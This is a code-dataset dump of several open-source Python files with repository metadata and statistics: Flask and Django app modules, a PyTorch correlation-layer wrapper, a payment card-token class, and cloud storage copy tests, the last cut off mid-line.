b33bdbd2f80119dc0fa3ed6d44865a3d45bc1e81
[ "MIT" ]
null
null
null
from .Classifier_collater import *
17.5
34
0.828571
4
35
7
1
0
0
0
0
0
0
0
0
0
0
0
0.114286
35
1
35
35
0.903226
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
87eb55ff41364df3cfc0737025c503d01a01802d
77
py
Python
proto_3/ddq/topics/logics/fol/quantifier.py
jadnohra/connect
8eb21e6f122898094447bc3d5edb3053d5a2adf2
[ "Unlicense" ]
null
null
null
proto_3/ddq/topics/logics/fol/quantifier.py
jadnohra/connect
8eb21e6f122898094447bc3d5edb3053d5a2adf2
[ "Unlicense" ]
6
2021-03-19T12:06:56.000Z
2022-03-12T00:23:09.000Z
proto_3/ddq/topics/logics/fol/quantifier.py
jadnohra/connect
8eb21e6f122898094447bc3d5edb3053d5a2adf2
[ "Unlicense" ]
null
null
null
from ddq.topics.logics.logic import Node class Quantifier(Node): pass
11
40
0.74026
11
77
5.181818
0.909091
0
0
0
0
0
0
0
0
0
0
0
0.181818
77
6
41
12.833333
0.904762
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
3553ec4c70c0fb08a7ca116c54c5219840de4732
22
py
Python
error/module.py
codelegant/python-action
6da939faa3a235d595825d442f72825b7849c393
[ "MIT" ]
null
null
null
error/module.py
codelegant/python-action
6da939faa3a235d595825d442f72825b7849c393
[ "MIT" ]
null
null
null
error/module.py
codelegant/python-action
6da939faa3a235d595825d442f72825b7849c393
[ "MIT" ]
null
null
null
import fib fib.fib(23)
11
11
0.772727
5
22
3.4
0.6
0.705882
0
0
0
0
0
0
0
0
0
0.1
0.090909
22
2
11
11
0.75
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
3561c00cf07dfa1d6c115b46e087253745853372
87
py
Python
app/main/__init__.py
josphat-otieno/blog-post
f331104ccd818147abfca0a8bb6852f3a2f0771c
[ "MIT" ]
null
null
null
app/main/__init__.py
josphat-otieno/blog-post
f331104ccd818147abfca0a8bb6852f3a2f0771c
[ "MIT" ]
null
null
null
app/main/__init__.py
josphat-otieno/blog-post
f331104ccd818147abfca0a8bb6852f3a2f0771c
[ "MIT" ]
null
null
null
from flask import Blueprint main=Blueprint('main', __name__) from .import views, forms
21.75
32
0.793103
12
87
5.416667
0.666667
0.4
0
0
0
0
0
0
0
0
0
0
0.114943
87
4
33
21.75
0.844156
0
0
0
0
0
0.045455
0
0
0
0
0
0
1
0
false
0
0.666667
0
0.666667
0.666667
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
1
0
6
3567d07266048188b0d0aef39c5805d3594bab73
104
py
Python
app/bot/__init__.py
NarayanAdithya/Portfolio2.0
691acbac1ad4220cb67c5e07a80bd401421f00d3
[ "MIT" ]
null
null
null
app/bot/__init__.py
NarayanAdithya/Portfolio2.0
691acbac1ad4220cb67c5e07a80bd401421f00d3
[ "MIT" ]
null
null
null
app/bot/__init__.py
NarayanAdithya/Portfolio2.0
691acbac1ad4220cb67c5e07a80bd401421f00d3
[ "MIT" ]
null
null
null
from flask import Blueprint bot = Blueprint('bot', __name__) from . import models, events, routes
13
38
0.721154
13
104
5.461538
0.692308
0.338028
0
0
0
0
0
0
0
0
0
0
0.192308
104
7
39
14.857143
0.845238
0
0
0
0
0
0.029412
0
0
0
0
0
0
1
0
false
0
0.666667
0
0.666667
0.666667
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
1
0
6
35a30c20a97ef18cfda0eb8e70d9c6497692b84e
7,126
py
Python
apps/quiz/models.py
diegocostacmp/e-quest
543d1bea571851a9fe2292363125a8b60105b253
[ "MIT" ]
1
2021-04-16T15:15:32.000Z
2021-04-16T15:15:32.000Z
apps/quiz/models.py
diegocostacmp/e-quest
543d1bea571851a9fe2292363125a8b60105b253
[ "MIT" ]
9
2020-02-12T02:52:08.000Z
2021-06-10T22:18:06.000Z
apps/quiz/models.py
diegocostacmp/e-quest
543d1bea571851a9fe2292363125a8b60105b253
[ "MIT" ]
null
null
null
from django.db import models import uuid from django.core.validators import MinValueValidator, MinLengthValidator from django.db import models from django.urls import reverse from django.utils.safestring import mark_safe from apps.core.models import ( User, Discipline ) # Status choices STATUS_CHOICES = ( ("A", "Ativo"), ("B", "Bloqueado"), ("D", "Desativado") ) class Quiz(models.Model): title = models.CharField(verbose_name="Título", max_length=128, help_text="Digite o nome da Discipline", null=False, blank=False, default=None) description = models.CharField(verbose_name="Descrição", max_length=512, help_text="Digite a descrição da Discipline", null=True, blank=True, default=None) uuid = models.UUIDField(verbose_name='Identificador Único', default=uuid.uuid4, editable=False) date_create = models.DateTimeField(verbose_name="Data criação", auto_now_add=True, blank=True, null=True) date_edit = models.DateTimeField(verbose_name="Data alteração", auto_now_add=True, blank=True, null=True) status = models.CharField(choices=STATUS_CHOICES, max_length=15, default="A") # fks discipline = models.ForeignKey(Discipline, verbose_name="Discipline", on_delete=models.PROTECT) user_create = models.ForeignKey(User, editable=False, related_name="+", on_delete=models.CASCADE) def __str__(self): return str(self.pk) def get_professor(self): return self.teacher.full_name def get_discipline(self): return self.discipline.title def get_status(self): if self.status == 'A': return mark_safe('<span style="width: 100%;"><span class="kt-badge kt-badge--success kt-badge--dot"></span>&nbsp;<span class="kt-font-bold kt-font-success">Ativo</span></span>') elif self.status == 'B': return mark_safe('<span style="width: 123px;"><span class="kt-badge kt-badge--danger kt-badge--dot"></span>&nbsp;<span class="kt-font-bold kt-font-danger">Bloqueado</span></span>') else: return mark_safe('<span style="width: 123px;"><span class="kt-badge kt-badge--warning kt-badge--dot"></span>&nbsp;<span 
class="kt-font-bold kt-font-warnings">Desativado</span></span>') class Question(models.Model): title = models.CharField(verbose_name="Título", max_length=512, help_text="Digite o nome da Discipline", null=False, blank=False, default=None) description = models.CharField(verbose_name="Descrição", max_length=1024, help_text="Digite a descrição da Discipline", null=True, blank=True, default=None) uuid = models.UUIDField(verbose_name='Identificador Único', default=uuid.uuid4, editable=False) date_create = models.DateTimeField(verbose_name="Data criação", auto_now_add=True, blank=True, null=True) date_edit = models.DateTimeField(verbose_name="Data alteração", auto_now_add=True, blank=True, null=True) status = models.CharField(choices=STATUS_CHOICES, max_length=15, default="A") # fks quiz = models.ForeignKey(Quiz, verbose_name="Quiz", on_delete=models.PROTECT) user_create = models.ForeignKey(User, editable=False, related_name="+", on_delete=models.CASCADE) last_id = models.CharField(verbose_name="Proximo", max_length=10, blank=True, null=True, default=None) time_solution = models.CharField(max_length=16, verbose_name="Tempo de solução", help_text = ("Tempo para resolver a questão"), blank=False, null=False, default=None) def __str__(self): return str(self.pk) def get_status(self): if self.status == 'A': return mark_safe('<span style="width: 100%;"><span class="kt-badge kt-badge--success kt-badge--dot"></span>&nbsp;<span class="kt-font-bold kt-font-success">Ativo</span></span>') elif self.status == 'B': return mark_safe('<span style="width: 123px;"><span class="kt-badge kt-badge--danger kt-badge--dot"></span>&nbsp;<span class="kt-font-bold kt-font-danger">Bloqueado</span></span>') else: return mark_safe('<span style="width: 123px;"><span class="kt-badge kt-badge--warning kt-badge--dot"></span>&nbsp;<span class="kt-font-bold kt-font-warnings">Desativado</span></span>') class Answer(models.Model): uuid = models.UUIDField(verbose_name='Identificador Único', 
default=uuid.uuid4, editable=False) date_create = models.DateTimeField(verbose_name="Data criação", auto_now_add=True, blank=True, null=True) date_edit = models.DateTimeField(verbose_name="Data alteração", auto_now_add=True, blank=True, null=True) status = models.CharField(choices=STATUS_CHOICES, max_length=15, default="A") user_create = models.ForeignKey(User, editable=False, related_name="+", on_delete=models.CASCADE, default=None) # Anwers alternative_A = models.CharField(max_length=512, verbose_name="Alternativa A", blank=False, null=False, default=None) alternative_B = models.CharField(max_length=512, verbose_name="Alternativa B", blank=False, null=False, default=None) alternative_C = models.CharField(max_length=512, verbose_name="Alternativa C", blank=False, null=False, default=None) alternative_D = models.CharField(max_length=512, verbose_name="Alternativa D", blank=False, null=False, default=None) alternative_true = models.CharField(max_length=16, verbose_name="Alternativa correta", blank=False, null=False) question = models.OneToOneField(Question, editable=False, related_name="question_related", on_delete=models.CASCADE) # Recompensas class reward(models.Model): uuid = models.UUIDField(verbose_name='Identificador Único', default=uuid.uuid4, editable=False) date_create = models.DateTimeField(verbose_name="Data criação", auto_now_add=True, blank=True, null=True) description = models.CharField(verbose_name="Descrição", max_length=1024, help_text="Digite a descrição da Discipline", null=True, blank=True, default=None) points = models.CharField(verbose_name="Pontos", max_length=5, help_text="Pontos ganhos", null=True, blank=True, default='0') # fks user = models.ForeignKey(User, editable=False, related_name="+", on_delete=models.CASCADE) discipline = models.ForeignKey(Discipline, editable=False, related_name="+", on_delete=models.CASCADE) def __str__(self): return str(self.pk) def get_nome_disciplina(self): return self.discipline.title # Recompensas alunos 
class reward_user(models.Model): uuid = models.UUIDField(verbose_name='Identificador Único', default=uuid.uuid4, editable=False) date_create = models.DateTimeField(verbose_name="Data criação", auto_now_add=True, blank=True, null=True) # fks user = models.ForeignKey(User, editable=False, related_name="+", on_delete=models.CASCADE) reward = models.ForeignKey(reward, editable=False, related_name="+", on_delete=models.CASCADE) def __str__(self): return str(self.pk) def get_nome_disciplina(self): return self.reward.title
57.934959
197
0.708953
945
7,126
5.196825
0.141799
0.062716
0.031765
0.031155
0.813684
0.790063
0.782733
0.73427
0.69436
0.689269
0
0.010978
0.156329
7,126
123
198
57.934959
0.805888
0.009543
0
0.568182
0
0.068182
0.22156
0.061277
0
0
0
0
0
1
0.113636
false
0
0.079545
0.090909
0.852273
0
0
0
0
null
0
0
0
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
6
ea0808f5e42c63412102de70e8542d9b396c2869
3,299
py
Python
Correlation/CorrelationCUDA/Corr2D.py
weurus/pointcloudexperiment-Tutorial
d457c6d17203df4b752fe0c6f1ad3ae5baa82693
[ "BSD-3-Clause" ]
12
2020-08-27T19:50:53.000Z
2022-01-25T23:13:47.000Z
Correlation/CorrelationCUDA/Corr2D.py
weurus/pointcloudexperiment-Tutorial
d457c6d17203df4b752fe0c6f1ad3ae5baa82693
[ "BSD-3-Clause" ]
1
2022-02-24T06:54:32.000Z
2022-02-24T07:52:43.000Z
Correlation/CorrelationCUDA/Corr2D.py
weurus/pointcloudexperiment-Tutorial
d457c6d17203df4b752fe0c6f1ad3ae5baa82693
[ "BSD-3-Clause" ]
2
2020-12-31T02:35:58.000Z
2021-08-14T23:05:19.000Z
import torch import Corr2D_ext def int_2_tensor(intList): return torch.tensor(intList, dtype=torch.int, requires_grad=False) def tensor_2_int(t): assert len(t.size()) == 1 assert t.size()[0] == 5 assert t.dtype == torch.int return t.tolist() class Corr2DF(torch.autograd.Function): @staticmethod def forward(ctx, x0, x1, maxDisplacement, \ padding=1, kernelSize=3, strideK=1, strideD=1): ctx.maxDisplacement = maxDisplacement ctx.padding = padding ctx.kernelSize = kernelSize ctx.strideK = strideK ctx.strideD = strideD out = Corr2D_ext.forward(x0, x1, padding, kernelSize, maxDisplacement, strideK, strideD) ctx.save_for_backward(x0, x1) return out[0] @staticmethod def backward(ctx, grad): x0, x1 = ctx.saved_tensors output = Corr2D_ext.backward( grad, x0, x1, ctx.padding, ctx.kernelSize, ctx.maxDisplacement, ctx.strideK, ctx.strideD ) return output[0], output[1], None, None, None, None, None class Corr2DM(torch.nn.Module): def __init__(self, maxDisplacement, padding=1, kernelSize=3, strideK=1, strideD=1): super(Corr2DM, self).__init__() assert maxDisplacement > 0 assert kernelSize > 0 assert kernelSize % 2 == 1 assert strideK > 0 assert strideD > 0 self.maxDisplacement = maxDisplacement self.padding = padding self.kernelSize = kernelSize self.strideK = strideK self.strideD = strideD def forward(self, x0, x1): return Corr2DF.apply( x0, x1, self.maxDisplacement, \ self.padding, self.kernelSize, self.strideK, self.strideD ) class Corr2DZNF(torch.autograd.Function): @staticmethod def forward(ctx, x0, x1, maxDisplacement, \ padding=1, kernelSize=3, strideK=1, strideD=1): ctx.maxDisplacement = maxDisplacement ctx.padding = padding ctx.kernelSize = kernelSize ctx.strideK = strideK ctx.strideD = strideD out = Corr2D_ext.forward_zn(x0, x1, padding, kernelSize, maxDisplacement, strideK, strideD) ctx.save_for_backward(x0, x1, out[0], out[1], out[2]) return out[0] @staticmethod def backward(ctx, grad): x0, x1, C, L0, L1 = ctx.saved_tensors output = Corr2D_ext.backward_zn( grad, x0, 
x1, C, L0, L1, ctx.padding, ctx.kernelSize, ctx.maxDisplacement, ctx.strideK, ctx.strideD ) return output[0], output[1], None, None, None, None, None class Corr2DZNM(torch.nn.Module): def __init__(self, maxDisplacement, padding=1, kernelSize=3, strideK=1, strideD=1): super(Corr2DZNM, self).__init__() assert maxDisplacement > 0 assert kernelSize > 0 assert kernelSize % 2 == 1 assert strideK > 0 assert strideD > 0 self.maxDisplacement = maxDisplacement self.padding = padding self.kernelSize = kernelSize self.strideK = strideK self.strideD = strideD def forward(self, x0, x1): return Corr2DZNF.apply( x0, x1, self.maxDisplacement, \ self.padding, self.kernelSize, self.strideK, self.strideD )
31.122642
99
0.625341
385
3,299
5.27013
0.150649
0.0276
0.035485
0.065057
0.865451
0.865451
0.865451
0.819123
0.819123
0.819123
0
0.036326
0.274022
3,299
105
100
31.419048
0.810856
0
0
0.675325
0
0
0
0
0
0
0
0
0.168831
1
0.12987
false
0
0.025974
0.038961
0.311688
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
ea6d2f5892cdb9f51ac9fd90f761b895d5ab55e3
336
py
Python
getnet/services/token/card_token.py
rafagonc/getnet-py
d2a5278b497408b5245d5d0fecd2e424f4ddb0d5
[ "MIT" ]
null
null
null
getnet/services/token/card_token.py
rafagonc/getnet-py
d2a5278b497408b5245d5d0fecd2e424f4ddb0d5
[ "MIT" ]
null
null
null
getnet/services/token/card_token.py
rafagonc/getnet-py
d2a5278b497408b5245d5d0fecd2e424f4ddb0d5
[ "MIT" ]
null
null
null
class CardToken: number_token: str def __init__(self, number_token: str): self.number_token = number_token def __str__(self): return str(self.number_token) def __eq__(self, other): match = other.number_token if isinstance(other, CardToken) else other return self.number_token == match
25.846154
77
0.678571
43
336
4.860465
0.348837
0.368421
0.287081
0.172249
0
0
0
0
0
0
0
0
0.241071
336
12
78
28
0.819608
0
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0
0.111111
0.777778
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
ea6f027ef4532aa6d3ff800e1c7581991fa3caa2
45,758
py
Python
e2e/cli/buckets/cp/test_cp_with_folders.py
msleprosy/cloud-pipeline
bccc2b196fad982380efc37a1c3785098bec6c85
[ "Apache-2.0" ]
null
null
null
e2e/cli/buckets/cp/test_cp_with_folders.py
msleprosy/cloud-pipeline
bccc2b196fad982380efc37a1c3785098bec6c85
[ "Apache-2.0" ]
12
2019-08-13T08:36:33.000Z
2019-10-01T12:04:31.000Z
e2e/cli/buckets/cp/test_cp_with_folders.py
msleprosy/cloud-pipeline
bccc2b196fad982380efc37a1c3785098bec6c85
[ "Apache-2.0" ]
2
2019-08-09T18:04:54.000Z
2019-08-11T19:03:06.000Z
# Copyright 2017-2019 EPAM Systems, Inc. (https://www.epam.com/) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from ..utils.assertions_utils import * from ..utils.file_utils import * from ..utils.utilities_for_test import * class TestCopyWithFolders(object): bucket_name = "epmcmbibpc-it-cp-folders{}".format(get_test_prefix()) other_bucket_name = "{}-other".format(bucket_name) current_directory = os.getcwd() home_dir = "test_cp_home_dir-597%s/" % get_test_prefix() checkout_dir = "checkout/" output_folder = "cp-folders-" + TestFiles.TEST_FOLDER_FOR_OUTPUT test_file_1 = "cp-folders-" + TestFiles.TEST_FILE1 test_file_with_other_extension = "cp-folders-" + TestFiles.TEST_FILE_WITH_OTHER_EXTENSION test_file_2 = "cp-folders-" + TestFiles.TEST_FILE2 test_folder = "cp-folders-" + TestFiles.TEST_FOLDER test_folder_2 = "cp-folders-" + TestFiles.TEST_FOLDER2 test_folder_structure = "cp-folders-structure" test_folder_structure_output = "cp-folders-structure-output" @classmethod def setup_class(cls): logging.basicConfig(filename='tests.log', level=logging.INFO, format='%(levelname)s %(asctime)s %(module)s:%(message)s') create_buckets(cls.bucket_name, cls.other_bucket_name) # /test_folder create_test_folder(os.path.abspath(cls.test_folder)) # /cp-files-test_folder_for_outputs create_test_folder(os.path.abspath(cls.output_folder)) # ./test_file.txt create_test_file(os.path.abspath(cls.test_file_1), TestFiles.DEFAULT_CONTENT) # ./test_folder/test_file.txt 
create_test_file(os.path.abspath(cls.test_folder + cls.test_file_1), TestFiles.DEFAULT_CONTENT) # ./test_folder/test_file.json create_test_file(os.path.abspath(cls.test_folder + cls.test_file_with_other_extension), TestFiles.DEFAULT_CONTENT) # ./test_folder/other/test_file.txt create_test_file(os.path.abspath(cls.test_folder + cls.test_folder + cls.test_file_1), TestFiles.DEFAULT_CONTENT) # ./test_file2.txt create_test_file(os.path.abspath(cls.test_file_2), TestFiles.COPY_CONTENT) # ~/test_cp_home_dir/test_file.txt create_test_file(os.path.join(os.path.expanduser('~'), cls.home_dir, cls.test_file_1), TestFiles.DEFAULT_CONTENT) # ~/test_cp_home_dir/other/test_file.txt create_test_file(os.path.join(os.path.expanduser('~'), cls.home_dir, cls.test_folder, cls.test_file_1), TestFiles.DEFAULT_CONTENT) # /test_folder_structure create_test_folder(os.path.abspath(cls.test_folder_structure)) # /test_folder_structure/test_folder/ create_test_folder(os.path.join(os.path.abspath(cls.test_folder_structure), cls.test_folder)) # /test_folder_structure/other/ create_test_folder(os.path.join(os.path.abspath(cls.test_folder_structure), cls.test_folder_2)) # /test_folder_structure/test_folder/test_file.txt create_test_file(os.path.join(os.path.abspath(cls.test_folder_structure), cls.test_folder, cls.test_file_1), TestFiles.DEFAULT_CONTENT) # /test_folder_structure/other/test_file.txt create_test_file(os.path.join(os.path.abspath(cls.test_folder_structure), cls.test_folder_2, cls.test_file_1), TestFiles.DEFAULT_CONTENT) # /test_folder_structure_output create_test_folder(os.path.abspath(cls.test_folder_structure_output)) @classmethod def teardown_class(cls): delete_buckets(cls.bucket_name, cls.other_bucket_name) clean_test_data(os.path.abspath(cls.test_file_1)) clean_test_data(os.path.abspath(cls.test_file_2)) clean_test_data(os.path.abspath(cls.test_folder)) clean_test_data(os.path.abspath(cls.output_folder)) clean_test_data(os.path.join(os.path.expanduser('~'), cls.home_dir)) 
clean_test_data(os.path.abspath(cls.checkout_dir)) clean_test_data(os.path.abspath(cls.test_folder_structure)) clean_test_data(os.path.abspath(cls.test_folder_structure_output)) """ 1. epam test case 2. source path 3. with --force option 4. flag if need to switch current directory """ test_case_for_upload_folders = [ ("EPMCMBIBPC-596", os.path.abspath(test_folder), False, None), ("EPMCMBIBPC-597", "~/" + home_dir, None, None), ("EPMCMBIBPC-598", "./" + test_folder, False, None), ("EPMCMBIBPC-598-1", "./", False, True), ("EPMCMBIBPC-598-2", ".", False, True), ("EPMCMBIBPC-599", os.path.abspath(test_folder) + "/", True, None), ] @pytest.mark.run(order=1) @pytest.mark.parametrize("case,source,force,switch_dir", test_case_for_upload_folders) def test_folder_should_be_uploaded(self, case, source, force, switch_dir): destination = "cp://{}/{}/".format(self.bucket_name, case) if force: create_test_files_on_bucket(os.path.abspath(self.test_file_2), self.bucket_name, os.path.join(case, self.test_file_1), os.path.join(case, self.test_folder, self.test_file_1)) if source.startswith("~"): source_to_check = os.path.join(os.path.expanduser('~'), source.strip("~/")) else: source_to_check = source if switch_dir: dir_path = os.path.abspath(os.path.join(self.checkout_dir)) create_test_files(TestFiles.DEFAULT_CONTENT, os.path.join(dir_path, self.test_file_1), os.path.join(dir_path, self.test_folder, self.test_file_1)) os.chdir(dir_path) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, force=force, recursive=True) assert_copied_object_info(ObjectInfo(True).build(os.path.join(source_to_check, self.test_file_1)), ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_file_1)), case) assert_copied_object_info(ObjectInfo(True).build(os.path.join(source_to_check, self.test_folder, self.test_file_1)), ObjectInfo(False).build(self.bucket_name, os.path.join( case, self.test_folder + self.test_file_1)), 
case) os.chdir(self.current_directory) """ 1. epam test case 2. source path 3. path to directory if need to switch current directory 4. relative path to file to rewrite (with --force option) """ test_case_for_download_folders = [ ("EPMCMBIBPC-596", os.path.abspath(output_folder + "EPMCMBIBPC-596") + "/", None, None), ("EPMCMBIBPC-597", "~/" + home_dir + output_folder, None, None), ("EPMCMBIBPC-598", "./" + output_folder + "EPMCMBIBPC-598/", None, None), ("EPMCMBIBPC-598-1", "./", None, True), ("EPMCMBIBPC-598-2", ".", None, True), ("EPMCMBIBPC-599", os.path.abspath(output_folder + "EPMCMBIBPC-599") + "/", True, None), ] @pytest.mark.run(order=2) @pytest.mark.parametrize("case,destination,force,switch_dir", test_case_for_download_folders) def test_folder_should_be_downloaded(self, case, destination, force, switch_dir): source = "cp://{}/{}/".format(self.bucket_name, case) if force: create_test_file(destination + self.test_file_1, TestFiles.COPY_CONTENT) assert os.path.exists(destination + self.test_file_1), \ "Test file {} does not exist".format(destination + self.test_file_1) create_test_file(destination + self.test_folder + self.test_file_1, TestFiles.COPY_CONTENT) assert os.path.exists(destination + self.test_folder + self.test_file_1), \ "Test file {} does not exist".format(destination + self.test_folder + self.test_file_1) if destination.startswith("~"): destination_to_check = os.path.join(os.path.expanduser('~'), destination.strip("~/")) else: destination_to_check = destination if switch_dir: dir_path = os.path.abspath(os.path.join(destination, self.checkout_dir, case)) create_test_folder(dir_path) os.chdir(dir_path) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, force=force, recursive=True) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, "{}/{}".format(case, self.test_file_1)), ObjectInfo(True).build(os.path.join(destination_to_check, self.test_file_1)), case) 
assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, "{}/{}".format( case, self.test_folder + self.test_file_1)), ObjectInfo(True).build(os.path.join(destination_to_check, self.test_folder, self.test_file_1)), case) os.chdir(self.current_directory) """ 1. epam test case 2. --force option """ test_case_for_copy_between_buckets_folders = [ ("EPMCMBIBPC-596", False), ("EPMCMBIBPC-599", True), ] @pytest.mark.run(order=3) @pytest.mark.parametrize("case,force", test_case_for_copy_between_buckets_folders) def test_folder_should_be_copied(self, case, force): source = "cp://{}/{}/".format(self.bucket_name, case) destination = "cp://{}/{}/".format(self.other_bucket_name, case) if force: create_test_files_on_bucket(os.path.abspath(self.test_file_2), self.other_bucket_name, os.path.join(case, self.test_file_1), os.path.join(case, self.test_folder, self.test_file_1)) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, force=force, recursive=True) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_file_1)), ObjectInfo(False).build(self.other_bucket_name, os.path.join(case, self.test_file_1)), case) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, os.path.join( case, self.test_folder, self.test_file_1)), ObjectInfo(False).build(self.other_bucket_name, os.path.join( case, self.test_folder, self.test_file_1)), case) @pytest.mark.run(order=1) def test_excluded_files_should_be_uploaded(self): source = os.path.abspath(self.test_folder) case = "EPMCMBIBPC-604-1" destination = "cp://{}/{}/".format(self.bucket_name, case) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, exclude=["*json", "{}*".format(self.test_folder)], expected_status=0) assert_copied_object_info(ObjectInfo(True).build(os.path.join(source, self.test_file_1)), 
ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.bucket_name, os.path.join( case, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.bucket_name, os.path.join( case, self.test_file_with_other_extension)), case) @pytest.mark.run(order=2) def test_excluded_files_should_be_downloaded(self): case = "EPMCMBIBPC-604-2" source = "cp://{}/{}/".format(self.bucket_name, case) key_file_1 = os.path.join(case, self.test_file_1) key_file_2 = os.path.join(case, self.test_file_with_other_extension) key_file_folder = os.path.join(case, self.test_folder, self.test_file_1) create_test_files_on_bucket(self.test_file_1, self.bucket_name, key_file_1, key_file_2, key_file_folder) destination = os.path.abspath(os.path.join(self.output_folder, case)) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, exclude=["*json", "{}*".format(self.test_folder)], expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, key_file_1), ObjectInfo(True).build(os.path.join(destination, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join( destination, self.test_file_with_other_extension)), case) @pytest.mark.run(order=3) def test_excluded_files_should_be_copied(self): case = "EPMCMBIBPC-604-3" source = "cp://{}/{}/".format(self.bucket_name, case) key_file_1 = os.path.join(case, self.test_file_1) key_file_2 = os.path.join(case, self.test_file_with_other_extension) key_file_folder = os.path.join(case, self.test_folder, self.test_file_1) create_test_files_on_bucket(self.test_file_1, self.bucket_name, key_file_1, key_file_2, key_file_folder) destination = 
"cp://{}/{}/".format(self.other_bucket_name, case) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, exclude=["*json", "{}*".format(self.test_folder)], expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, key_file_1), ObjectInfo(False).build(self.other_bucket_name, key_file_1), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.other_bucket_name, key_file_folder), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.other_bucket_name, key_file_2), case) @pytest.mark.run(order=1) def test_included_files_should_be_uploaded(self): source = os.path.abspath(self.test_folder) case = "EPMCMBIBPC-630-1" destination = "cp://{}/{}/".format(self.bucket_name, case) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, include=["*json"], expected_status=0) assert_copied_object_info( ObjectInfo(True).build(os.path.join(source, self.test_file_with_other_extension)), ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_file_with_other_extension)), case) assert_copied_object_does_not_exist( ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(False).build( self.bucket_name, os.path.join(case, self.test_file_1)), case) @pytest.mark.run(order=2) def test_included_files_should_be_downloaded(self): case = "EPMCMBIBPC-630-2" source = "cp://{}/{}/".format(self.bucket_name, case) key_file_1 = os.path.join(case, self.test_file_1) key_file_2 = os.path.join(case, self.test_file_with_other_extension) key_file_folder = os.path.join(case, self.test_folder, self.test_file_1) create_test_files_on_bucket(self.test_file_1, self.bucket_name, key_file_1, key_file_2, key_file_folder) destination = os.path.abspath(os.path.join(self.output_folder, 
case)) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, include=["*json"], expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, key_file_2), ObjectInfo(True).build(os.path.join(destination, self.test_file_with_other_extension)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, case, self.test_file_1)), case) @pytest.mark.run(order=3) def test_included_files_be_copied(self): case = "EPMCMBIBPC-630-3" source = "cp://{}/{}/".format(self.bucket_name, case) destination = "cp://{}/{}/".format(self.other_bucket_name, case) key_file_1 = os.path.join(case, self.test_file_1) key_file_2 = os.path.join(case, self.test_file_with_other_extension) key_file_folder = os.path.join(case, self.test_folder, self.test_file_1) create_test_files_on_bucket(self.test_file_1, self.bucket_name, key_file_1, key_file_2, key_file_folder) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, include=["*json"], expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, key_file_2), ObjectInfo(False).build(self.other_bucket_name, key_file_2), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.other_bucket_name, key_file_folder), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.other_bucket_name, key_file_1), case) @pytest.mark.run(order=1) def test_included_excluded_files_should_be_uploaded(self): source = 